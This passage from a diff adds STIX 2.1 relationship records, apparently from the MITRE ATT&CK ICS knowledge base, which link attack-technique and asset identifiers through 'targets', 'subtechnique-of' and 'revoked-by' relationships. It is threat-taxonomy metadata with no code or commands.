"attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e398ecb9-1e98-4518-aff8-aa18f527f9dc", + "created": "2020-06-28T22:55:55.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e3a5a480-6a6c-467a-9436-4c7adae27c2a", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e3b04152-0c90-41ff-a333-c5163fa9714f", + "created": "2023-09-29T17:41:22.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:41:22.619Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e3b994f7-f628-4047-9f3e-0e270d7416c8", + "created": "2024-06-27T09:30:04.997Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:30:04.997Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfb525cc-5494-401d-a82b-2539ca46a561", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e3ecc827-062a-498a-9203-c1cc4d532aba", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e3fe170d-55c7-4f98-9d39-6ee28403ce87", + "created": "2020-10-02T16:55:16.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e40ec8b2-1cd0-4607-b093-667b62fb5aa5", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e413188a-a371-4eaa-94d0-c0fee3a73d43", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e41a04fe-a142-4294-a9f2-576214e1f985", + "created": "2024-04-09T20:48:04.616Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:48:04.616Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e434db5d-f201-4411-825f-4a50e1e78c75", + "created": "2023-09-29T17:06:20.834Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:06:20.834Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e44a4e0e-42ff-4740-9810-387c373cd69d", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4524375-481e-4ab8-a3c3-3e3b101e3314", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e46e0eee-a2a1-4763-868a-fc99b1cd9809", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e479e710-3aa0-4e57-b601-c2cbfac04d9b", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e47dc3cd-ddf6-4207-97e2-fed7e4cf6960", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e487a902-80ce-4194-941c-deb7acfabe47", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e489ef54-fada-4576-85f6-aad269b4e13a", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e49c9a63-79e4-4451-a3c6-71f7b52be682", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e49e0138-4247-4f3e-a42c-f0dab2f6ffbc", + "created": "2023-09-29T18:49:44.351Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:49:44.351Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4a43af9-e8f0-42cf-a707-b2393efb44f5", + "created": "2020-03-20T19:03:04.500Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4b31529-c618-4e5a-8375-485875c04750", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4bc29f2-87c8-491d-b51b-d6cede7c1972", + "created": "2023-09-29T16:45:33.777Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:45:33.777Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4c5c523-9eb1-46cf-8b67-dbe7e65cfa2e", + "created": "2024-06-26T13:38:09.314Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:38:09.314Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4c62e59-d14e-4cbc-a4a9-4f64bd523d5a", + "created": "2024-04-09T21:00:11.159Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T03:34:18.846Z", + "description": "Asset Mapping Rationale: Adversaries may modify software and device credentials to prevent operator and responder access. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4ce44d4-8b71-4d79-b0cf-fb790c79544e", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4e84628-09b8-4ca4-a8a3-2121b75598a9", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4ec5b7f-375f-4737-98e5-3c249366438b", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4f3a1be-451c-4a7b-9c89-0e240a640e3b", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4f7408a-6432-4839-afdc-3d3a75816cd9", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e4fff053-4dbc-43e8-98b4-ce592e9401a3", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5171fe7-25a9-448e-aa81-9cc5bb38bf98", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5198acd-f108-4d46-a52c-fbcea6149a73", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e525352e-0d7e-41e4-bb35-9c50f9ef39c6", + "created": "2020-01-24T14:32:40.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5348b39-64f3-4340-bc88-2d960b3fecf4", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e53b374f-2e45-4bd6-b02c-7187d6f883b8", + "created": "2024-06-27T09:11:53.485Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:11:53.485Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e53e765c-0c1e-41dd-84a2-fdce68b54ceb", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e53fdbf8-7c7f-42e3-9af6-e2b8f52dc5dc", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e5633d85-4246-404e-81ad-4087bb44350f", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", 